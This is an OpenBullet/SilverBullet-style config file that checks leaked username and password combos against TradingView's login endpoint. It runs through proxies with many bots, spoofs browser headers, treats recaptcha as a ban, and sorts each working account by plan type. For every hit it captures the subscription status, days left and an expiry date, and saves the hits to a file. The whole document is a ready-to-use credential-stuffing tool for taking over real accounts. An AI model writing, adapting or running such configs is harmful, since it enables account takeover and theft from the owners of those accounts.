[SETTINGS]
{
  "Name": "TradingView",
  "SuggestedBots": 130,
  "MaxCPM": 0,
  "LastModified": "2024-08-27T19:52:31.9079579+05:30",
  "AdditionalInfo": "https://github.com/aneekirfan",
  "RequiredPlugins": [],
  "Author": "Aneek",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "https://github.com/aneekirfan",
      "VariableName": "",
      "Id": 1621177907
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "TradingView",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://www.tradingview.com/accounts/signin/" 
  CONTENT "-----------------------------13850636453563974081867548077\\nContent-Disposition: form-data; name=\"username\"\\n\\n<USER>\\n-----------------------------13850636453563974081867548077\\nContent-Disposition: form-data; name=\"password\"\\n\\n<PASS>\\n-----------------------------13850636453563974081867548077--\\n" 
  CONTENTTYPE "multipart/form-data; boundary=---------------------------13850636453563974081867548077" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Referer: https://www.tradingview.com/" 
  HEADER "x-language: en" 
  HEADER "x-requested-with: XMLHttpRequest" 
  HEADER "Content-Type: multipart/form-data; boundary=---------------------------13850636453563974081867548077" 
  HEADER "Origin: https://www.tradingview.com" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"error\":\"\"" 
  KEYCHAIN Failure OR 
    KEY "invalid" 
  KEYCHAIN Custom "FREE" AND 
    KEY "is_pro\":false" 
    KEY "is_trial\":false" 
  KEYCHAIN Ban OR 
    KEY "recaptcha_required" 

PARSE "<SOURCE>" JSON "verbose_name" CreateEmpty=FALSE -> CAP "Plan" 

PARSE "<SOURCE>" JSON "is_trial" CreateEmpty=FALSE -> CAP "Trail" 

PARSE "<SOURCE>" JSON "is_pro" CreateEmpty=FALSE -> CAP "Pro" 

PARSE "<SOURCE>" JSON "pro_plan_days_left" CreateEmpty=FALSE -> CAP "DaysLeft" 

BEGIN SCRIPT JavaScript Jint
function addDays(days) {
    const currentDate = new Date();
    currentDate.setDate(currentDate.getDate() + parseInt(days));
    return currentDate.toISOString().split('T')[0];
}
var daysToAdd = DaysLeft;
var Expiry = addDays(daysToAdd);
END SCRIPT -> VARS "Expiry"
SET CAP "Expiry on" "<Expiry> | https://github.com/aneekirfan"

